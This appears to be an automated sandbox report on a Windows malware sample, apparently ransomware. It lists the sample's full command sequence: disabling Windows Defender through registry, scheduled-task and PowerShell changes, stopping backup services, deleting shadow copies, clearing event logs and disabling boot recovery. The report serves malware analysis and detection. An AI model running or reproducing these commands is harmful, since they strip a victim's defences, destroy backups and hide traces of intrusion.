cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe sc.exe PID 2744 wrote to memory of 1260 2744 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe sc.exe PID 2744 wrote to memory of 2348 2744 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe sc.exe PID 2744 wrote to memory of 2348 2744 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe sc.exe PID 2744 wrote to memory of 1324 2744 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe sc.exe PID 2744 wrote to memory of 1324 2744 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe sc.exe PID 2744 wrote to memory of 2268 2744 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe sc.exe PID 2744 wrote to memory of 2268 2744 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe sc.exe PID 2744 wrote to memory of 1360 2744 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe sc.exe PID 2744 wrote to memory of 1360 2744 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe sc.exe PID 2744 wrote to memory of 1792 2744 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe sc.exe PID 2744 wrote to memory of 1792 2744 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe sc.exe PID 2744 wrote to memory of 1848 2744 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe sc.exe PID 2744 wrote to memory of 1848 2744 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe sc.exe PID 2744 wrote to memory of 1296 2744 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe sc.exe PID 2744 wrote to memory of 1296 2744 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe sc.exe PID 2744 wrote to memory of 2172 2744 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe reg.exe PID 2744 wrote to memory of 2172 2744 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe reg.exe PID 2744 wrote to memory of 2404 2744 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe reg.exe PID 2744 wrote to memory of 2404 2744 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe reg.exe PID 2744 wrote to memory of 736 2744 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe reg.exe PID 2744 wrote to memory of 736 2744 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe reg.exe PID 2744 wrote to memory of 3580 2744 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe reg.exe PID 2744 wrote to memory of 3580 2744 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe reg.exe PID 2744 wrote to memory of 976 2744 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe reg.exe PID 2744 wrote to memory of 976 2744 cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe"C:\Users\Admin\AppData\Local\Temp\cce2ebba7447792f1a3734d567fcce244332b6767f40beace68ad5dfded51fcf.exe"1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2744 -
C:\Windows\SYSTEM32\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3140 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:3340
-
C:\Windows\SYSTEM32\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3084 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:980
-
C:\Windows\SYSTEM32\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:300 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:2232
-
C:\Windows\SYSTEM32\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2948 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:668
-
C:\Windows\SYSTEM32\net.exenet.exe stop "vmicvss" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3732 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "vmicvss" /y3⤵PID:3820
-
C:\Windows\SYSTEM32\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3552 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:812
-
C:\Windows\SYSTEM32\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:2896 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:1504
-
C:\Windows\SYSTEM32\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1088 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:368
-
C:\Windows\SYSTEM32\net.exenet.exe stop "UnistoreSvc_1305b" /y2⤵
- Suspicious use of WriteProcessMemory
PID:660 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UnistoreSvc_1305b" /y3⤵PID:1228
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SamSs" start= disabled2⤵PID:3664
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SDRSVC" start= disabled2⤵PID:1260
-
C:\Windows\SYSTEM32\sc.exesc.exe config "SstpSvc" start= disabled2⤵PID:2348
-
C:\Windows\SYSTEM32\sc.exesc.exe config "UI0Detect" start= disabled2⤵PID:1324
-
C:\Windows\SYSTEM32\sc.exesc.exe config "vmicvss" start= disabled2⤵PID:2268
-
C:\Windows\SYSTEM32\sc.exesc.exe config "VSS" start= disabled2⤵PID:1360
-
C:\Windows\SYSTEM32\sc.exesc.exe config "wbengine" start= disabled2⤵PID:1792
-
C:\Windows\SYSTEM32\sc.exesc.exe config "WebClient" start= disabled2⤵PID:1848
-
C:\Windows\SYSTEM32\sc.exesc.exe config "UnistoreSvc_1305b" start= disabled2⤵PID:1296
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2172
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:2404
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:736
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:3580
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:976
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:824
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵PID:2992
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:3584
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵PID:3080
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:3212
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:1384
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:3828
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:2592
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:912
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1072
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1916
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:3796
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:3984
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:2212
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:844
-
C:\Windows\SYSTEM32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:1504
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:1240
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:1552
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:672
-
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:1456 -
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:2328 -
C:\Windows\SYSTEM32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:3660 -
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1328
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1700
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1992
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3944
-
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:2580 -
C:\Windows\SYSTEM32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2152
-
C:\Windows\SYSTEM32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:1300 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2192 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3232 -
C:\Windows\SYSTEM32\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3152 -
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1288 -
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2344 -
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:2248 -
C:\Windows\SYSTEM32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:1080 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:3448
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:3644 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:2888
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1696 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:1816
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2536
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
8592ba100a78835a6b94d5949e13dfc1
SHA163e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA51287f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3
-
MD5
1818f9518d4c172d8c694a6a36bea290
SHA1ed49b3173b899cc38e527717cc70190d678157d4
SHA256c5c9250742223d71ce502f58e3f90822f7623e9fc521df7da570385efecab6af
SHA51274a2f78c017f59b033672b388ab58da8b5e4ef5b7a3d575b821dcec29366ab3ec08fac15d9d31b843c58f18a1d885d2f1d41c3eff73ccb53928cf70341e8d995